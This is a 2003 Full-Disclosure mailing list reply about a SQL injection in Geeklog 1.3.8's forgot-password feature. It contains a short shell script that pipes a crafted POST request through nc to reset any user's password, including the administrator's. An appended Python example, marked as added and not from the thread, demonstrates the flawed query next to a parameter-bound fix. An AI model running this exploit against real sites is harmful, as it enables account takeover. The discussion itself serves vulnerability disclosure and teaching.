Full Disclosure mailing list archives

Re: Geeklog exploit


From: Thomas Rogg <thomas () outcast-media com>
Date: Sun, 19 Oct 2003 20:15:15 +0200

On 19.10.2003 at 18:21, Jouko Pynnonen wrote at jouko () iki fi:


...
The exploit uses the "forgot password" feature introduced in Geeklog
1.3.8. By constructing a certain kind of HTTP request, an attacker can
change any user's Geeklog password, including the administrator
password. This is because of an SQL injection problem. In users.php we have
this kind of code (line about 750):
...

I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML
says: "Your request for a new password has expired. Please try again below."

Am I missing something? All I changed was to use HTTP/1.1 and to use
parameters for host and path:

-----
#!/bin/sh

echo "POST $2users.php HTTP/1.1
Host: $1
Connection: close
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&
" | nc $1 80
-----

Thank you,

Thomas
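Added example, not code from this thread or from Geeklog: the bug class Jouko describes (an attacker-supplied reset id spliced into the SQL string, so `rid=3'+or+uid='1` rewrites the WHERE clause) next to the same check done with bound parameters, run against a constructed SQLite table. The table and column names (`passwordreset`, `uid`, `rid`, `requesttime`), the 24-hour validity window and the single pending request for uid 1 are assumptions chosen to mirror the request parameters in the script above, not Geeklog's real schema.

```python
import sqlite3

# Assumed validity window for a reset id; Geeklog's real value is not on the page.
RESET_TTL_SECONDS = 24 * 60 * 60


def make_db(now):
    """Constructed in-memory database: uid 1 has a pending reset, uid 2 (Admin) has none."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, passwd TEXT);
        CREATE TABLE passwordreset (uid INTEGER, rid TEXT, requesttime INTEGER);
        INSERT INTO users VALUES (1, 'someuser', 'hash-1');
        INSERT INTO users VALUES (2, 'Admin', 'hash-admin');
    """)
    # The only legitimate pending request belongs to uid 1 (constructed sample row).
    con.execute("INSERT INTO passwordreset VALUES (1, 'legit-rid', ?)", (now,))
    con.commit()
    return con


def reset_allowed_vulnerable(con, uid, rid, now):
    """Builds the query by string interpolation: the pattern the thread reports.

    With uid='2' and rid="3' or uid='1" the WHERE clause becomes
        uid = 2 AND rid = '3' or uid='1'
    which SQL groups as (uid = 2 AND rid = '3') OR uid = '1'. The pending
    request of uid 1 satisfies it, so the check passes for uid 2, an account
    that never asked for a reset.
    """
    sql = (f"SELECT uid, requesttime FROM passwordreset "
           f"WHERE uid = {uid} AND rid = '{rid}'")
    row = con.execute(sql).fetchone()
    return row is not None and now - row[1] <= RESET_TTL_SECONDS


def reset_allowed_safe(con, uid, rid, now):
    """Same check with validated, parameter-bound inputs.

    uid must be an integer; rid is passed as a bound value, so whatever it
    contains is only ever compared as data and never parsed as SQL. The row
    returned must also belong to the uid being reset and be within the TTL.
    """
    try:
        uid_int = int(uid)
    except (TypeError, ValueError):
        return False
    row = con.execute(
        "SELECT uid, requesttime FROM passwordreset WHERE uid = ? AND rid = ?",
        (uid_int, rid),
    ).fetchone()
    if row is None:
        return False
    return row[0] == uid_int and now - row[1] <= RESET_TTL_SECONDS


def compare(now=1_000_000):
    """Runs the payload from the thread through both checks; returns the outcomes."""
    con = make_db(now)
    payload_uid, payload_rid = "2", "3' or uid='1"
    return {
        "vulnerable_accepts_payload": reset_allowed_vulnerable(con, payload_uid, payload_rid, now),
        "safe_accepts_payload": reset_allowed_safe(con, payload_uid, payload_rid, now),
        "safe_accepts_legit": reset_allowed_safe(con, "1", "legit-rid", now),
        "safe_accepts_expired": reset_allowed_safe(con, "1", "legit-rid", now + RESET_TTL_SECONDS + 1),
    }


if __name__ == "__main__":
    for name, outcome in compare().items():
        print(f"{name}: {outcome}")
```

The expiry branch in `reset_allowed_safe` produces the same kind of "request has expired" refusal the reply above reports; the example only shows that a parameterized lookup and an explicit uid match close the injection, it does not claim to explain why that particular run was refused.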

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
